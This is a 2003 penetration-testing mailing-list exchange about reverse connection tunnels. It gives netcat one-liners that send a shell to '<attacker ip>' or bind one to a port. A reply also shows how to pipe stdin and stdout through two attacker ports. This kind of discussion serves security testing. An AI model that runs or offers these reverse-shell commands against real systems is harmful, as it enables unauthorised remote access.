RE: command-line reverse connection tunnel?

["Paul Bakker" <bakker () fox-it com>]

The second command (pushing the shell), can be better written as:
nc <attacker ip> 1234 -e /bin/sh

(This works on both Linux/Windows environments with the current netcat versions,
probably with older versions as well)

This saves you the trouble of connecting stdin and stdout to two seperate ports
and gives you a shell as you expect it!..

Paul Bakker

-----Oorspronkelijk bericht-----
Van: Steven Gill [mailto:gman1120 () hotmail com]
Verzonden: maandag 17 maart 2003 4:27
Aan: filip () securax be; pen-test () securityfocus com
Onderwerp: RE: command-line reverse connection tunnel?


Yes, you can use netcat to send a shell back, but it is a pain to use it for 
port redirection. E.G. for a shell you can:

nc -l -p <port> -e /bin/sh

or

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and 
stdout connected to the above ports respectively.  But we want to use more 
robust services other than shell, such as getting GUI on Windows via 
terminal services or other more complex protocols.

----------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does. Plug your security holes now!
Download a free 15-day trial of VAM:
http://www2.stillsecure.com/download/sf_vuln_list.html